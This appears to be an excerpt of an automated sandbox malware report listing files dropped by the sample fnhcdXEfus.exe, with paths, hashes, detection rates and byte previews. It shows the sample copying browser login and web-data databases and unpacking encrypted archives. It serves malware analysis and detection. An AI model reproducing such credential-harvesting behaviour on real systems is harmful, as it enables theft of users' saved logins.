                                                                                                                                                                        Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                                        C:\Users\user\AppData\Local\Login Data1612045889505
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Login Data1612045902661
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1612045891739
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):37737
                                                                                                                                                                        Entropy (8bit):7.994967159065528
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                                        MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                                        SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                                        SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                                        SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1612045892739
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):553040
                                                                                                                                                                        Entropy (8bit):7.999671101282436
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                                        MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                                        SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                                        SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                                        SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4453376
                                                                                                                                                                        Entropy (8bit):7.745694560857276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
                                                                                                                                                                        MD5:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        SHA1:C6C6EACAA8DF6EA5251C7F26A2D9EC4317092E6A
                                                                                                                                                                        SHA-256:344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
                                                                                                                                                                        SHA-512:8DEACA50E918252BA85715C85096E810733A9512C656FA40AD71E22437CC8F74D1965468592929A4B1216D33DA598C308B312F5C1AA770F62959C873A4582EFB
                                                                                                                                                                        Malicious:true
                                                                                                                                                                         Antivirus:
                                                                                                                                                                         • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                         • Antivirus: Metadefender, Detection: 35%
                                                                                                                                                                         • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                         Joe Sandbox View:
                                                                                                                                                                         • Filename: fnhcdXEfus.exe, Detection: malicious
                                                                                                                                                                        Preview: MZ......................@.............................................d....L.!This program cannot be run in DOS mode....$.............Z..Z..Zw]qZ..Zw]lZ..Z$\oZ..Z$\lZZ..Z)..Z..Z$\mZ...Z)..Z...Z..Zu..Zw]mZ.Zw]kZ..Z.5Z..Zw]nZ..ZRich..Z........................PE..L...n..[.................F..........:R.......`....@.......................... ............@................................................................ ..T....h..8............................w..@............`...............................text....D.......F.................. ....rdata..*f...`...h...J..............@..@.data...p........$..................@....rsrc..............................@..@.reloc....... .......p..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe:Zone.Identifier
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):6656
                                                                                                                                                                        Entropy (8bit):5.2861874904617645
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                                        MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                                        SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                                        SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                                        SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                                        Malicious:false
                                                                                                                                                                         Antivirus:
                                                                                                                                                                         • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                         • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                         Joe Sandbox View:
                                                                                                                                                                         • Filename: 6MhmlD8KZh.exe, Detection: malicious
                                                                                                                                                                         • Filename: fnhcdXEfus.exe, Detection: malicious
                                                                                                                                                                         • Filename: Cyfj6XGbkd.exe, Detection: malicious
                                                                                                                                                                         • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                                         • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 268744
Entropy (8bit): 5.398284390686728
Encrypted: false
SSDEEP: 6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5: E2E9483568DC53F68BE0B80C34FE27FB
SHA1: 8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256: 205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512: B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 8%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: fnhcdXEfus.exe, Detection: malicious
• Filename: Cyfj6XGbkd.exe, Detection: malicious
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: Cyfj6XGbkd.exe, Detection: malicious
• Filename: N1yprTBBXs.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
• Filename: FileSetup-v17.04.41.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 73160
Entropy (8bit): 6.49500452335621
Encrypted: false
SSDEEP: 1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5: F0372FF8A6148498B19E04203DBB9E69
SHA1: 27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256: 298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512: 65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 2%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\atl71.dll
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 89600
Entropy (8bit): 6.46929682960805
Encrypted: false
SSDEEP: 1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5: 79CB6457C81ADA9EB7F2087CE799AAA7
SHA1: 322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256: A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512: ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 92080
Entropy (8bit): 5.923150781730819
Encrypted: false
SSDEEP: 1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5: DBA9A19752B52943A0850A7E19AC600A
SHA1: 3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256: 69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512: A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3512776
Entropy (8bit): 6.514740710935125
Encrypted: false
SSDEEP: 49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5: 1A87FF238DF9EA26E76B56F34E18402C
SHA1: 2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256: ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512: B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Process: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 503808
Entropy (8bit): 6.4043708480235715
Encrypted: false
SSDEEP: 12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5: A94DC60A90EFD7A35C36D971E3EE7470
SHA1: F936F612BC779E4BA067F77514B68C329180A380
SHA-256: 6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512: FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 3%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):348160
Entropy (8bit):6.56488891304105
Encrypted:false
SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 3%
C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):59904
Entropy (8bit):6.753320551944624
Encrypted:false
SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:89F6488524EAA3E5A66C5F34F3B92405
SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Temp\ecvB803.tmp
Process:C:\Users\user\AppData\Roaming\1612045890161.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb2e8beb6, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):1.0164576350128136
Encrypted:false
SSDEEP:24576:wEwqTaoxujmVezmgxeCAGiSoB0yLKgSFDb7uBi:GmVezxerk
MD5:4D015B11306E72A07B0F37934ABF3A16
SHA1:288A561B9346A93F4BF13ABEA91A5B4097D27504
SHA-256:DB4D8315572F112B0A7AA20F26A779A10613D81C11C6646810F369AFBBC17C44
SHA-512:E406B63B2E3FDC4BB666EF3E26F092E16D54DD155142E1524828DCFD13251CB312B785AFD97172A75227A6377057E6348889A443AA4D7706C0EAE60436201FD3
Malicious:false
C:\Users\user\AppData\Local\Temp\gdiview.msi
Process:C:\Users\user\Desktop\fnhcdXEfus.exe
File Type:;1033
Category:modified
Size (bytes):237056
Entropy (8bit):6.262405449836627
Encrypted:false
SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:false
C:\Users\user\AppData\Local\Temp\xldl.dat
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:7-zip archive data, version 0.3
Category:dropped
Size (bytes):1397922
Entropy (8bit):7.999863097294012
Encrypted:true
SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:false
C:\Users\user\AppData\Local\Temp\xldl.dll
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):293320
Entropy (8bit):6.347427939821131
Encrypted:false
SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Web Data1612045902911
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
C:\Users\user\AppData\Local\crx.7z
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:7-zip archive data, version 0.3
Category:dropped
Size (bytes):36105
Entropy (8bit):7.994610469125073
Encrypted:true
SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:DAFDD7237BA10D0C91295CD1C15749B2
SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:false
C:\Users\user\AppData\Local\crx.json
